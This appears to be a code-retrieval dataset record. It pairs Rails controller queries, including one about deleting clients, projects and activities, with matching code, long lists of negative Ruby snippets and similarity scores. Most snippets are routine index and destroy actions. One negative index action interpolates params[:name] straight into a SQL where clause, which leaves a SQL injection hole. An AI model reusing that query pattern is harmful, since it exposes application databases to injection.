    flash[:notice] = 'Listing the latest 20 tasks'
  end
  @hours = total_hours(@tasks)
  respond_to do |format|
    format.html
    format.csv { send_data tasks_to_csv(@tasks) }
  end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_tasks\n tasks = @repository.all\n @view.display_tasks(tasks)\n end",
"def list_tasks\n # ASK REPO for the tasks\n tasks = @task_repository.all\n # ASK VIEW to display them\n @tasks_view.display(tasks)\n end",
"def show_tasks\n\t\tputs \"here are the tasks on the #{self.name} list...\"\n\t\t@tasks.map.with_index {|task, i| puts \"#{i.next}. \" + task.description + \" | complete: \" + task.status.to_s}\n\t\tputs \"\\n\"\n\tend",
"def index\n @task_lists = TaskList.all\n end",
"def tasks\n task_list.tasks\n end",
"def index\n @tasklists = Tasklist.all\n end",
"def list_tasks\n config = instantiate_configuration\n config.load 'deploy'\n \n set_up_config(config)\n \n config.task_list(:all)\n end",
"def index\n @tasks = @list.tasks.order(status: :asc)\n return render_success_task_index\n end",
"def list_all_tasks\n #instance of View\n tasks = @repository.all # Array of tasks\n @view.display_all_tasks(tasks) #View to display all the tasks\n end",
"def index\n @task_lists = Task::List.all.active\n end",
"def task_lists(current_token)\n session = RedboothRuby::Session.new(token: current_token)\n client = RedboothRuby::Client.new(session)\n\n client.task_list(:index, project_id: self.id).all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def index\n @tasks = Task.all\n end",
"def list_all_tasks\n task = Task.all\nend",
"def list_tasks\r\n unless tasks\r\n puts \"No tasks yet. Add one!\"\r\n return\r\n end\r\n # Pretty-format hash and print\r\n print \" \" + \"ITEM\".ljust(30) + \" | \" +\r\n \"WHEN DUE\".ljust(15) + \" | \" +\r\n \"WHEN ADDED\".ljust(15) + \"\\n\"\r\n tasks.each do |task|\r\n print \"<#{tasks.find_index(task) + 1}>\".ljust(5) +\r\n task[:text].ljust(30) + \" | \" +\r\n task[:due].ljust(15) + \" | \" +\r\n task[:time].ljust(15) + \"\\n\"\r\n end\r\n end",
"def task_list\n self.tasks.map do |task|\n task.text\n end\n end",
"def all_tasks\n @tasks = Task.all\n render :index\n end",
"def list_tasks\n load_tasks\n\n # set '$thor_runner' to true to display full namespace\n $thor_runner = true\n\n list = [] #Thor.printable_tasks(all = true, subcommand = true)\n Thor::Base.subclasses.each do |klass|\n list += klass.printable_tasks(false) unless klass == Thor\n end\n list.sort!{ |a,b| a[0] <=> b[0] }\n\n title = \"repo_manager tasks\"\n shell.say shell.set_color(title, :blue, bold=true)\n shell.say \"-\" * title.size\n shell.print_table(list, :ident => 2, :truncate => true)\n end",
"def index\n @tasks = Task.where(isArchived: false)\n @task = Task.new\n @lists = List.all\n end",
"def index\n @task_lists = @user.task_lists\n end",
"def index\n breadcrumb_for_collections(@collection)\n semantic_breadcrumb @collection.name, @collection\n semantic_breadcrumb \"Tasks\"\n @tasks = @collection.tasks\n end",
"def index\n @todolist = Todolist.find(params[:todolist_id])\n @task = @todolist.tasks.find(params[:id])\n\n @tasks = @todolist.tasks.where(completed: false).order('created_at ASC')\n @completed_tasks = @todolist.tasks.where(completed: true).order('updated_at')\n end",
"def index\n authenticate_user!\n @tasks = current_user.tasks\n end",
"def index\n @tasks = Task.all \n end",
"def tasklists\n get gtasks_tasklists_url\n end",
"def index\n if !current_user.admin then\n redirect_back fallback_location: root_path\n end\n @tasks = Task.all\n end",
"def index\n if Task::TASK_STATES.include?(params[:state]) then\n @tasks = @tasklist.tasks.where(:tstate => params[:state])\n else\n @tasks = @tasklist.tasks\n render action: \"index\", :notice => \"Wrong state. All tasks are listed.\"\n end\n end",
"def display_tasks\n # get the array from the repo\n tasks = @repo.all\n # display all the tasks\n @view.display_tasks(tasks)\n end",
"def index\r\n @tasks = get_sorted_list_of_tasks\r\n respond_to do |format|\r\n format.html # index.html.erb\r\n format.xml { render :xml => @tasks }\r\n end\r\n end",
"def index\n set_tasks\n if @role === 'admin'\n @tasks = Task.all\n end\n if @role === 'merchant'\n @tasks = Task.where(merchant: spree_current_user.merchant_id)\n end\n end",
"def display_tasks(tasks) # we need the tasks\n # CONTRACT:\n # [x] buy croissants\n # [ ] buy coffee\n tasks.each_with_index do |task, index|\n # if task.done?\n # puts \"[x] #{task.name}\"\n # else\n # puts \"[ ] #{task.name}\"\n # end\n\n status = task.done? ? 'x' : ' '\n puts \"[#{status}] #{index + 1}. #{task.name}\"\n end\n end",
"def task_lists\n\t\t@task_lists ||= fetch_latest_task_lists\n\tend",
"def tasks\n @client.list_tasks(cluster: @cluster, service_name: @name)[0]\n end",
"def index\n @tasks = current_user.lists.find(params[:list_id]).tasks\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @tasks }\n end\n end",
"def index\n @tasks = Tasks::List.call(params: task_search_params, user: current_user).model\n @tasks = @tasks.page(params[:page]).order(created_at: :desc)\n end",
"def index\n @pm_tasks = Pm::Task.all\n end",
"def index\n @checklists = Checklist.get_checklist_entries(current_user).get_pending_tasks.paginate(page: params[:page])\n end",
"def tasks(list)\n list_obj = list.is_a?(Wunderlist::List) ? list : lists[list]\n list = list.id if list.is_a? Wunderlist::List\n\n request = prepare_request(Net::HTTP::Get.new \"#{@path}/ajax/lists/id/#{list}\")\n response = @http.request request\n result = []\n\n Nokogiri::HTML(JSON.parse(response.body)[\"data\"]).css(\"li.more\").each do |html_task|\n task = Wunderlist::Task.new\n task.id = html_task.attributes[\"id\"].value.to_i\n task.name = html_task.css(\"span.description\").first.content\n task.important = html_task.css(\"span.fav\").empty? ? false : true\n task.done = html_task.attributes[\"class\"].value.split(\" \").include?(\"done\")\n html_timestamp = html_task.css(\"span.timestamp\")\n task.date = Time.at(html_timestamp.first.attributes[\"rel\"].\n value.to_i).to_date unless html_timestamp.empty?\n task.note = html_task.css('span.note').first.content\n task.api = self\n task.list = list_obj\n\n result << task\n end\n\n result\n end",
"def list_user_tasks\n\t\t@tasks = current_user.get_developer_tasks\n\tend",
"def tasks(project_id)\n account = Config.details \n c = FreshBooks::Client.new(account[\"account\"], account[\"token\"])\n c.task.list :project_id => project_id\n end",
"def get_tasks(param_map, *args)\n #Strip off the first element, since it is not a Task\n get(\"tasks\", param_map, Babar::Task, true, *args)\n end",
"def index\n @api_tasks = Api::Task.all\n end",
"def show # Show tasks method\n all_tasks.map.with_index { |l, i| \"(#{i.next}): #{l}\"} # Show all tasks array in numerical order and whether a task is completed\n end",
"def fetch_latest_tasks_for(list)\n\t\t@tasks[list] = @client.execute(api_method: @gtasks.tasks.list, parameters: { 'tasklist' => list.id }).data.items\n\tend",
"def all\n @main_list = Task.order(\"deadline ASC\")\n @main_list_header = \"All tasks\"\n @done_unbilled_tasks = []\n @active_subnavi = \"ALL\";\n render :index\n end",
"def index\n @tasks = (current_user.admin? ? Task.all : current_user.tasks)\n @error = nil\n if params[:name].present?\n resp = Task.where(\"name ilike '%#{params[:name]}%'\")\n if resp.present? \n if !current_user.admin?\n resp = resp.where(:user_id => current_user.id)\n end\n @tasks = resp \n end\n if resp.blank?\n @error = \"No Task Present with \\'#{params[:name]}\\' name\"\n end\n end \n end",
"def display_tasks\n puts \"What do you want to do? \\n\"\n puts TASKS.values\n end",
"def index\n # GET /tasks\n @tasks = Task.all\n end",
"def tasks(tasklist_id = '@default')\n get gtasks_tasks_url(tasklist_id)\n end",
"def index\n @tasks = current_user.tasks.all.order(id: :desc)\n success_task_index\n end",
"def index\n @tasks = @project.tasks\n end",
"def index\n @tasks = @project.tasks\n end",
"def index\n redirect_to root_path and return unless signed_in?\n set_tasks\n @task = Task.new\n end",
"def index\n @task_items = Task::Item.all\n end",
"def index\n @project = Project.find(params[:project_id])\n @tasks = @project.tasks\n end",
"def show_tasks(tasks)\n tasks.each_with_index do |task, index|\n status = task.done? ? \"x\" : \" \"\n puts \"#{index + 1}. [#{status}] #{task.name}\"\n end\n end",
"def index\n @tasks = @current_user.tasks\n end",
"def get_task_list(id)\n response = request(\n :expects => 200,\n :idempotent => true,\n :method => 'GET',\n :parser => Fog::ToHashDocument.new,\n :path => \"tasksList/#{id}\"\n )\n ensure_list! response.body, :Task\n response\n end",
"def index\n @task_entries = TaskEntry.all\n end",
"def index\n @task_entries = TaskEntry.all\n end",
"def index\n @tasks = Task.all.order( 'starttime DESC' )\n end",
"def index\n @project = Project.find(params[:project_id])\n @tasks = @project.tasks.all\n end",
"def show\n @task_list = TaskList.find(params[:id])\n add_breadcrumb I18n.t(\"tasklist.breadcrumbs.show\"), project_task_list_path\n\n respond_with @task_lists\n end",
"def index\n @tasklistings = Tasklisting.all\n end",
"def index\n authorize! :read, Task\n @tasks = Task.order(sort_column + \" \" + sort_direction).page(params[:page]).per(20)\n\n respond_to do |format|\n format.html # index.html.erb\n end\n end",
"def show\n @tasks = @list.tasks\n # Setting a layout different from the default\n render layout: 'application'\n end",
"def index\n @tasks = @group.tasks\n end",
"def load_special_tasks\n $bot[:tasks][:list] = {\n block: -> do\n list_tasks\n end,\n desc: 'List all available tasks'\n }\n end",
"def index\n active_task\n completed_task\n end",
"def index\n @personal_tasks = PersonalTask.all_personal_tasks(session[:userid])\n @complete = PersonalTask.all_complete_personal_tasks(session[:userid])\n @incomplete = PersonalTask.all_incomplete_personal_tasks(session[:userid])\n end",
"def todo\n @tasks = TaskDecorator.decorate_collection Task.getReadyToDoTasks\n render \"v1/tasks/index\"\n end",
"def tasks\n uri = URI(BASE_URL + TASKS_ENDPOINT)\n\n make_request(uri)\n end",
"def index\n @tasks = Task.where(user_id: current_user.id)\n end",
"def index\n\t if current_user.has_role? :admin\n\t\t @tasks = Task.all\n\t elsif current_user.has_role? :ing\n\t\t @user = User.find(current_user)\n\t\t @tasks = @user.tasks\n\t end\n end",
"def get_tasks(tasklist)\n tasklist_id = tasklist[\"id\"]\n tasklist.tasks = @client.execute(\n api_method: @api.tasks.list,\n parameters: {tasklist: tasklist_id}\n ).data.to_hash[\"items\"]\n end",
"def index\n @project_tasks = ProjectTask.all\n end",
"def index\n @project_tasks = ProjectTask.all\n end",
"def setupTasksList\n require 'tmpdir'\n lTasksFileName = \"#{Dir.tmpdir}/WEACE_Tasks_#{Thread.current.object_id}.lst\"\n File.open(lTasksFileName, 'w') do |oFile|\n oFile << 'TaskID 1\nTaskID 2\nTaskID 3'\n end\n yield(lTasksFileName)\n File.unlink(lTasksFileName)\n end",
"def index\n @tasks = @list.tasks.where(\"type = ?\",\"TaskTemp\").where.not(\"estado = ?\",\"expirada\").order(:prioridad)\n end",
"def index\n @user_tasks_infos = UserTasksInfo.all\n end"
] |
[
"0.80346555",
"0.7865056",
"0.7764971",
"0.7649433",
"0.76244104",
"0.76218575",
"0.76078546",
"0.75892705",
"0.74091125",
"0.73889077",
"0.72768027",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.7268407",
"0.72676414",
"0.7235183",
"0.72109073",
"0.71893996",
"0.7182689",
"0.7153179",
"0.7123504",
"0.7122293",
"0.7119392",
"0.71176076",
"0.70781904",
"0.7077212",
"0.70762885",
"0.70753413",
"0.70405006",
"0.70280594",
"0.7026455",
"0.702625",
"0.70155",
"0.70071965",
"0.70037377",
"0.6995548",
"0.6990511",
"0.69776833",
"0.69727576",
"0.6953102",
"0.6951332",
"0.6945786",
"0.6943834",
"0.69400734",
"0.6923626",
"0.69194335",
"0.6914624",
"0.6908675",
"0.689542",
"0.68766665",
"0.6876613",
"0.6875888",
"0.6875888",
"0.68584746",
"0.6858448",
"0.6856046",
"0.68534595",
"0.68414086",
"0.6834679",
"0.6831364",
"0.6831364",
"0.68002427",
"0.6797978",
"0.67928946",
"0.6791886",
"0.6785271",
"0.67828524",
"0.6782697",
"0.67807895",
"0.67724216",
"0.6771039",
"0.6769769",
"0.676785",
"0.6749007",
"0.6747931",
"0.6744634",
"0.6731807",
"0.6731807",
"0.6730672",
"0.67289853",
"0.6727934"
] |
0.69733655
|
57
|
controller for deleting clients/projects/activities
|
def delete_client
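  # One admin endpoint handles deletion for clients, projects, activities
  # and assignments; the params hash determines which record is removed.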
  if c_delete_params[:client]
    client = Client.find(c_delete_params[:client])
    name = client.name
    client.destroy
    flash[:notice] = 'Deleted client: ' + name
    return redirect_to '/admin/list_clients'
  elsif c_delete_params[:project]
    project = Project.find(c_delete_params[:project])
    name = project.name
    project.destroy
    flash[:notice] = 'Deleted project: ' + name
    return redirect_to :back
  elsif c_delete_params[:activity]
    activity = Activity.find(c_delete_params[:activity])
    project_id = activity.project.id
    name = activity.name
    activity.destroy
    flash[:notice] = 'Deleted activity: ' + name
    # Jump back to the parent project's anchor on the referring page.
    return redirect_to request.referer + '#project' + project_id.to_s
  elsif c_delete_params[:assignment]
    assignment = Assignment.find(c_delete_params[:assignment])
    activity_id = assignment.activity.id
    assignment.destroy
    flash[:notice] = 'Deleted assignment'
    return redirect_to request.referer + '#activity' + activity_id.to_s
  end
rescue
  flash[:error] = 'There was an error'
  redirect_to :back
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @activities_project = ActivitiesProject.find(params[:id])\n @activities_project.destroy\n\n respond_to do |format|\n format.html { redirect_to(activities_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project = @client.projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to @client }\n end\n end",
"def destroy\n @project = @client.projects.find(params[:id])\n\n begin\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(client_projects_url(@client), notice: 'Project was deleted.') }\n format.xml { head :ok }\n end\n rescue ActiveRecord::DeleteRestrictionError\n redirect_to client_project_url(@client, @project), notice: \"Delete was restricted.\"\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n activity = current_user.create_activity(@project, 'deleted')\n activity.user_id = current_user.id\n format.html { redirect_to dashboard_path, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n client_id = @project.client_id\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to client_projects_path(client_id), notice: \"成功删除#{Project.model_name.human}\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project_activity.destroy\n respond_to do |format|\n format.html { redirect_to project_activities_url, notice: 'Project activity was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = @projectable.projects.find(params[:id])\n @project.destroy\n track_activity @project\n\n respond_to do |format|\n format.html { redirect_to [@projectable, :projects] }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @cliente = @project.cliente\n @project.destroy\n respond_to do |format|\n format.html { redirect_to user_projects_url, notice: 'Proyecto borrado :(' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @activity = Activity.create(user_id: current_user.id, activity_type: 'Destroy', target_type: 'Project', target_id: @project.id)\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n @activity.destroy\n respond_to do |format|\n format.html { redirect_to project_activities_url(@project), notice: 'Activity was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:project_id])\n if @project.nil? || @project.client.user != current_user\n respond_to do |format|\n format.html { redirect_to projects_path, :notice => \"Sorry, you don't have access to that project.\" }\n format.json { render :status => 404 }\n end\n end\n @task = Task.find(params[:id])\n @task.destroy\n\n respond_to do |format|\n format.html { redirect_to project_tasks_url(@project), :notice => \"Task was successfully deleted.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @client = @entity.project.client\n @entity.destroy\n\n respond_to do |format|\n format.html { redirect_to(client_entities_url(@client), :notice => \"Entity was successfully destroyed. #{undo_link}\") }\n end\n end",
"def destroy\n @client = Client.find(params[:id])\n\n project_id = @client.project_id\n\n # Destroy all the client's posts\n clients_posts = Post.where(:user_id => @client.id)\n clients_posts.each do |post|\n post.destroy\n end\n\n @client.destroy\n\n respond_to do |format|\n format.html { redirect_to project_url(:id => project_id, :page => 'options') }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize @project\n @project.destroy\n render json: [\"Deleted successfully.\"], status: :ok\n end",
"def destroy\n @dev_activity.destroy\n respond_to do |format|\n format.html { redirect_to dev_activities_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = current_user.active_projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n Rails.logger.info \"We are deleting project\"\n @todo_project.destroy\n respond_to do |format|\n format.html { redirect_to todo_projects_url, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @partner_project = PartnerProject.find(params[:id])\n @partner_project.destroy\n\n respond_to do |format|\n format.html { redirect_to partner_projects_url }\n format.json { head :no_content }\n end\n end",
"def delete\r\n\t\t\trender json: Project.delete_by_id(params[:id])\r\n\t\tend",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to admin_projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @dashboard_project.destroy\n respond_to do |format|\n format.html { redirect_to dashboard_projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize(@project)\n\n @project.destroy\n respond_to do |format|\n format.html do\n redirect_to projects_url,\n notice: t('removed')\n end\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy_all\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'The project was successfully removed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = current_user.projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n @projects = Project.all\n render :index\n end",
"def destroy\n # @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n authorize_action_for @project\n\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: t('models.project.destroy') }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize! :delete, @project\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @projects_objetive.destroy\n respond_to do |format|\n format.html { redirect_to projects_objetives_url, notice: 'Projects objetive was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\t\t\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Successfully deleted project.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n #@project = Project.find(params[:id])\n #@project.destroy\n\n #respond_to do |format|\n # format.html { redirect_to(goals_url) }\n # format.xml { head :ok }\n #end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to administration_projects_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize! :destroy, @project\n @project.destroy\n\n head :no_content\n end",
"def destroy\n # Delete tasks within project\n @project.tasks.each do |task|\n task.destroy\n end\n\n # Delete items and records within project\n @project.items.each do |item|\n item.records.each do |record|\n record.destroy\n end\n item.destroy\n end\n\n # Delete jobs within project\n @project.jobs.each do |job|\n job.destroy\n end\n\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.delete\n\n respond_to do |format|\n format.html { redirect_to request.referer }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ourproject = Ourproject.find(params[:id])\n @ourproject.destroy\n\n respond_to do |format|\n format.html { redirect_to ourprojects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n authorize_action_for @project\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Admin::Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\r\n @project.destroy\r\n respond_to do |format|\r\n format.html { redirect_to projects_url }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @pat_project = Pat::Project.find(params[:id])\n @pat_project.destroy\n\n respond_to do |format|\n format.html { redirect_to(pat_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n @project.users.delete_all\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n standard_destroy(Project, params[:id])\n end",
"def destroy\n authenticate_user!\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n \n @project = Project.find(params[:id])\n if @project.deleted == true\n @project.deleted = false\n else\n @project.deleted = true\n end\n @project.save\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n begin\n if @client_company.projects.present? || @client_company.users.present?\n respond_to do |format|\n format.js\n end\n else\n @client_company.destroy\n @destroy = true\n respond_to do |format|\n format.js\n end\n end\n rescue => e\n redirect_to projects_path, notice: 'Project can not deleted because it is linked with its assosiative records'\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n \n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @my_studio_client = MyStudio::Client.find(params[:id])\n @my_studio_client.destroy\n\n respond_to do |format|\n format.html { redirect_to my_studio_clients_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Proyecto eliminado sastifactoriamente' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @activity = current_user.activities.find(params[:id])\n @activity.destroy\n\n respond_to do |format|\n format.html { redirect_to activities_url }\n format.json { head :ok }\n end\n end",
"def destroy\n redirect_to index_project_path\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: \"#{I18n.t 'project.project_destoy'}\"}\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n employee_projects = EmployeesProjects.find EmployeesProjects.search_by(project_id: @project.key)\n employee_projects.map &:destroy\n @project.destroy\n respond_to do |format|\n if Project.list.blank?\n format.html { redirect_to startup_projects_path }\n else\n format.html { redirect_to learn_projects_path }\n format.json { head :no_content }\n end\n end\n end",
"def destroy\n @project = Company.find(params[:company_id]).projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_path, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_projects_url }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize Project\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.status = 'deleted'\n @project.save!\n\n respond_to do |format|\n format.json { render :json => \"success\" }\n end\n end",
"def destroy\n # @project = Project.find(params[:id])\n # @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Projeto deletado.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to admin_url(:user_id => current_user.id), notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.json { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @redirect_url = @project_component.project\n @project_component.destroy\n respond_to do |format|\n format.html { redirect_to project_path(@redirect_url), notice: 'Project component was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n if current_user.admin?\n format.html { redirect_to projects_path , notice: 'Projekt bol vymazaný.' }\n else\n format.html { redirect_to root_path, notice: 'Projekt bol vymazaný.' }\n end\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Proyecto eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
